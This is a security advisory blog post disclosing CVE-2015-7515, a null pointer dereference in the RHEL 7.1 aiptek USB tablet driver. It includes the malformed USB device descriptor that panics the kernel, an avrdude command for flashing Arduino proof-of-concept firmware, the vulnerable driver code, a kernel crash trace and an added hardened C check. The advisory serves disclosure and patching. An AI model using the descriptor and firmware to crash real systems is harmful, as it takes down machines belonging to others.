
Friday, March 11, 2016

OS-S 2016-05 Linux aiptek Nullpointer Dereference CVE-2015-7515 P1

OS-S Security Advisory 2016-05
Linux aiptek Nullpointer Dereference

Date: March 4th, 2016
Authors: Sergej Schumilo, Hendrik Schwartke, Ralf Spenneberg
CVE: CVE-2015-7515
CVSS:  4.9 (AV:L/AC:L/Au:N/C:N/I:N/A:C)
Title: Local RedHat Enterprise Linux DoS – RHEL 7.1 Kernel crashes on invalid USB device descriptors (aiptek driver)
Severity: Critical. The Kernel panics. A reboot is required.
Ease of Exploitation: Trivial
Vulnerability type: Wrong input validation
Products: RHEL 7.1 including all updates
Kernel-Version: 3.10.0-229.20.1.el7.x86_64 (for debugging purposes we used the CentOS Kernel kernel-debuginfo-3.10.0-229.14.1.el7)
Vendor: Red Hat
Vendor contacted: November, 12th 2015
PDF of Advisory: https://os-s.net/advisories/OSS-2016-05_aiptek.pdf

Abstract:
The Kernel 3.10.0-229.20.1.el7.x86_64 crashes when presented with a buggy USB
device handled by the aiptek driver.

Detailed product description:
We confirmed the bug on the following system:
RHEL 7.1
Kernel 3.10.0-229.20.1.el7.x86_64
Further products or kernel versions have not been tested.
How reproducible: Always
Actual results: Kernel crashes.

Description:
The bug was found using the USB-fuzzing framework vUSBf from Sergej Schumilo
(github.com/schumilo) using the following device descriptor:

[*] Device-Descriptor
  bLength:                0x12
  bDescriptorType:        0x1
  bcdUSB:                 0x200
  bDeviceClass:           0x3
  bDeviceSubClass:        0x0
  bDeviceProtocol:        0x0
  bMaxPacketSize:         0x40
  idVendor:               0x458
  idProduct:              0x5003
  bcdDevice:              0x100
  iManufacturer:          0x1
  iProduct:               0x2
  iSerialNumbers:         0x3
  bNumConfigurations:     0x1
  [*] Configuration-Descriptor
    bLength:              0x9
    bDescriptorType:      0x2
    wTotalLength:         0x27
    bNumInterfaces:       0x1
    bConfigurationValue:  0x1
    iConfiguration:       0x0
    bmAttributes:         0x0
    bMaxPower:            0x31
    [*] Interface-Descriptor
      bLength:            0x9
      bDescriptorType:    0x4
      bInterfaceNumber:   0x0
      bAlternateSetting:  0x0
      bNumEndpoints:      0x0
      bInterfaceClass:    0x0
      bInterfaceSubClass: 0x0
      bInterfaceProtocol: 0x0
      [*] Endpoint-Descriptor:
        bLength:          0x7
        bDescriptorType:  0x5
        bEndpointAddress: 0x81
        bmAttribut:       0x3
        wMaxPacketSize:   0x404
        bInterval:        0xc
      [*] Endpoint-Descriptor:
        bLength:          0x7
        bDescriptorType:  0x5
        bEndpointAddress: 0x1
        bmAttribut:       0x2
        wMaxPacketSize:   0x4
        bInterval:        0xc
      [*] Endpoint-Descriptor:
        bLength:          0x7
        bDescriptorType:  0x5
        bEndpointAddress: 0x82
        bmAttribut:       0x1
        wMaxPacketSize:   0x4
        bInterval:        0xc


The aiptek driver assumes that there is at least one endpoint descriptor.
If the interface descriptor carries a zero value for bNumEndpoints, or no
endpoint descriptor is provided at all, the driver dereferences a null
pointer and the kernel crashes:

****
$ nm aiptek.ko.debug | grep aiptek_probe
0000000000001ea0 t aiptek_probe
$ addr2line -e aiptek.ko.debug 2303
/usr/src/debug/kernel-3.10.0-229.14.1.el7/linux-3.10.0-229.14.1.el7.x86_64/drivers/input/tablet/aiptek.c:1830
****

**** CentOS-Kernel linux-3.10.0-229.14.1.el7 (drivers/input/tablet/aiptek.c)

1822    endpoint = &intf->altsetting[0].endpoint[0].desc; /* Nullpointer */
1823
1824    /* Go set up our URB, which is called when the tablet receives
1825     * input.
1826     */
1827    usb_fill_int_urb(aiptek->urb,
1828             aiptek->usbdev,
1829             usb_rcvintpipe(aiptek->usbdev,
1830                    endpoint->bEndpointAddress), /* Nullpointer-Dereference */
1831             aiptek->data, 8, aiptek_irq, aiptek,
1832             endpoint->bInterval);
****
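The hardened form of the endpoint selection above, as an added example (not the advisory's code and not the vendor patch): the structs are simplified stand-ins for the kernel's usb_host_interface and friends, and the helper names (aiptek_pick_int_in, is_int_in, fuzzed_alt, tablet_alt) are assumptions. It goes slightly beyond the advisory by also rejecting an endpoint of the wrong type, the way usb_endpoint_is_int_in() does.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <errno.h>

/* Simplified stand-ins for the kernel's usb_endpoint_descriptor,
 * usb_host_endpoint, usb_interface_descriptor and usb_host_interface. */
struct ep_desc { uint8_t bEndpointAddress, bmAttributes; uint16_t wMaxPacketSize; uint8_t bInterval; };
struct host_ep { struct ep_desc desc; };
struct if_desc { uint8_t bInterfaceNumber, bNumEndpoints; };
struct host_if { struct if_desc desc; struct host_ep *endpoint; /* NULL when bNumEndpoints is 0 */ };

/* Same test usb_endpoint_is_int_in() performs: IN direction and interrupt transfer type. */
static int is_int_in(const struct ep_desc *d)
{
    return (d->bEndpointAddress & 0x80) && (d->bmAttributes & 0x03) == 0x03;
}

/* Hardened endpoint selection: checks bNumEndpoints before touching endpoint[0]
 * and skips endpoints that are not interrupt-IN. Returns 0 or -EINVAL. */
int aiptek_pick_int_in(const struct host_if *alt, uint8_t *addr, uint8_t *interval)
{
    if (alt->desc.bNumEndpoints < 1 || alt->endpoint == NULL)
        return -EINVAL;                  /* the unfixed probe dereferenced NULL here */
    for (unsigned i = 0; i < alt->desc.bNumEndpoints; i++) {
        const struct ep_desc *d = &alt->endpoint[i].desc;
        if (is_int_in(d)) { *addr = d->bEndpointAddress; *interval = d->bInterval; return 0; }
    }
    return -EINVAL;                      /* no usable interrupt-IN endpoint */
}

/* Constructed samples. fuzzed_alt mirrors what the USB core builds from the
 * advisory's descriptor: bNumEndpoints = 0, so no endpoint array exists. */
struct host_if fuzzed_alt = { { 0, 0 }, NULL };
static struct host_ep tablet_eps[] = { { { 0x01, 0x02, 0x0004, 0x0c } },   /* bulk OUT */
                                       { { 0x82, 0x03, 0x0008, 0x0c } } }; /* interrupt IN */
struct host_if tablet_alt = { { 0, 2 }, tablet_eps };

int main(void)
{
    uint8_t addr, interval;
    printf("fuzzed: %d\n", aiptek_pick_int_in(&fuzzed_alt, &addr, &interval));
    if (aiptek_pick_int_in(&tablet_alt, &addr, &interval) == 0)
        printf("tablet: IN endpoint 0x%02x, bInterval %u\n", addr, interval);
    return 0;
}
```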




Proof of Concept:
For a proof of concept, we are providing an Arduino Leonardo firmware file. This
firmware will emulate the defective USB device.


avrdude -v -p ATMEGA32u4 -c avr109 -P /dev/ttyACM0 -b 57600 -U flash:w:binary.hex


The firmware has been attached to this bug report.
To prevent the automated delivery of the payload, a jumper may be used to
connect port D3 to 3V3.

Severity and Ease of Exploitation:
The vulnerability can be easily exploited. Using our Arduino Leonardo firmware,
only physical access to the system is required.

Vendor Communication:
We contacted Red Hat on November 12th, 2015.
A patch was provided on November 25th, 2015.

References:
https://bugzilla.redhat.com/show_bug.cgi?id=1285326
https://bugzilla.redhat.com/show_bug.cgi?id=1283350


Kernel Stacktrace:

[  622.149957] usb 1-1: new full-speed USB device number 2 using xhci_hcd
[  622.354485] usb 1-1: config 1 interface 0 altsetting 0 has 3 endpoint descriptors, different from the interface descriptor's value: 0
[  622.386630] usb 1-1: New USB device found, idVendor=0458, idProduct=5003
[  622.392414] usb 1-1: New USB device strings: Mfr=1, Product=2, SerialNumber=3
[  622.399416] usb 1-1: Product: ĉ
[  622.404640] usb 1-1: Manufacturer: ĉ
[  622.410079] usb 1-1: SerialNumber: %
[  622.444650] BUG: unable to handle kernel NULL pointer dereference at 0000000000000002
[  622.445019] IP: [<ffffffffa0395303>] aiptek_probe+0x463/0x658 [aiptek]
[  622.445019] PGD 0
[  622.445019] Oops: 0000 [#1] SMP
[  622.445019] Modules linked in: aiptek(+) ip6t_rpfilter ip6t_REJECT ipt_REJECT xt_conntrack ebtable_nat ebtable_broute bridge stp llc ebtable_filter ebtables ip6table_nat nf_conntrack_ipv6 nf_defrag_ipv6 nf_nat_ipv6 ip6table_mangle ip6table_security ip6table_raw ip6table_filter ip6_tables iptable_nat nf_conntrack_ipv4 nf_defrag_ipv4 nf_nat_ipv4 nf_nat nf_conntrack iptable_mangle iptable_security iptable_raw iptable_filter ip_tables bochs_drm ppdev syscopyarea sysfillrect sysimgblt ttm drm_kms_helper drm pcspkr i2c_piix4 i2c_core serio_raw parport_pc parport xfs libcrc32c sd_mod sr_mod crc_t10dif cdrom crct10dif_common ata_generic pata_acpi ata_piix libata e1000 floppy dm_mirror dm_region_hash dm_log dm_mod
[  622.445019] CPU: 0 PID: 2242 Comm: systemd-udevd Not tainted 3.10.0-229.14.1.el7.x86_64 #1
[  622.445019] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014
[  622.445019] task: ffff88000e65a220 ti: ffff88000f4cc000 task.ti: ffff88000f4cc000
[  622.445019] RIP: 0010:[<ffffffffa0395303>]  [<ffffffffa0395303>] aiptek_probe+0x463/0x658 [aiptek]
[  622.445019] RSP: 0018:ffff88000f4cfb80  EFLAGS: 00010286
[  622.445019] RAX: 0000000000000000 RBX: ffff88000bd67800 RCX: ffff88000bcd0800
[  622.445019] RDX: 0000000000000000 RSI: 0000000000000008 RDI: ffff88000ca29000
[  622.445019] RBP: ffff88000f4cfbe0 R08: 0000000000000000 R09: 0000000000000000
[  622.445019] R10: ffff88000e401400 R11: ffffffff810020d8 R12: ffff88000c525800
[  622.445019] R13: ffff88000c525830 R14: ffff88000bcd1800 R15: ffff88000bd67834
[  622.445019] FS:  00007fb8082b4880(0000) GS:ffff88000fc00000(0000) knlGS:0000000000000000
[  622.445019] CS:  0010 DS: 0000 ES: 0000 CR0: 000000008005003b
[  622.445019] CR2: 0000000000000002 CR3: 000000000d67f000 CR4: 00000000000006f0
[  622.445019] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[  622.445019] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400
[  622.445019] Stack:
[  622.445019]  ffff88000bcd0800 0000000000000001 0000019000000246 0000019000000032
[  622.445019]  0000006400000019 0000012c000000c8 000000000cc3e092 ffff88000bcd0890
[  622.445019]  ffff88000bcd0800 ffffffffa0397068 ffff88000c525830 ffffffffa03965c0
[  622.445019] Call Trace:
[  622.445019]  [<ffffffff8141dc04>] usb_probe_interface+0x1c4/0x2f0
[  622.445019]  [<ffffffff813d30d7>] driver_probe_device+0x87/0x390
[  622.445019]  [<ffffffff813d34b3>] __driver_attach+0x93/0xa0
[  622.445019]  [<ffffffff813d3420>] ? __device_attach+0x40/0x40
[  622.445019]  [<ffffffff813d0e43>] bus_for_each_dev+0x73/0xc0
[  622.445019]  [<ffffffff813d2b2e>] driver_attach+0x1e/0x20
[  622.445019]  [<ffffffff813d2680>] bus_add_driver+0x200/0x2d0
[  622.445019]  [<ffffffff813d3b34>] driver_register+0x64/0xf0
[  622.445019]  [<ffffffff8141c1c2>] usb_register_driver+0x82/0x160
[  622.445019]  [<ffffffffa039a000>] ? 0xffffffffa0399fff
[  622.445019]  [<ffffffffa039a01e>] aiptek_driver_init+0x1e/0x1000 [aiptek]
[  622.445019]  [<ffffffff810020e8>] do_one_initcall+0xb8/0x230
[  622.445019]  [<ffffffff810dd0ee>] load_module+0x133e/0x1b40
[  622.445019]  [<ffffffff812f7d60>] ? ddebug_proc_write+0xf0/0xf0
[  622.445019]  [<ffffffff810d96b3>] ? copy_module_from_fd.isra.42+0x53/0x150
[  622.445019]  [<ffffffff810ddaa6>] SyS_finit_module+0xa6/0xd0
[  622.445019]  [<ffffffff81614389>] system_call_fastpath+0x16/0x1b
[  622.445019] Code: 45 31 c9 45 31 c0 b9 ff 03 00 00 be 08 00 00 00 4c 89 f7 e8 90 39 0d e1 49 8b 04 24 48 8b 4b 08 48 8b bb 10 01 00 00 48 8b 40 18 <0f> b6 50 02 0f b6 70 06 8b 01 c1 e2 0f c1 e0 08 81 ca 80 00 00
[  622.445019] RIP  [<ffffffffa0395303>] aiptek_probe+0x463/0x658 [aiptek]
[  622.445019]  RSP <ffff88000f4cfb80>
[  622.445019] CR2: 0000000000000002
[  622.860772] ---[ end trace b239663354a1c556 ]---
[  622.864813] Kernel panic - not syncing: Fatal exception
[  622.865768] drm_kms_helper: panic occurred, switching back to text console

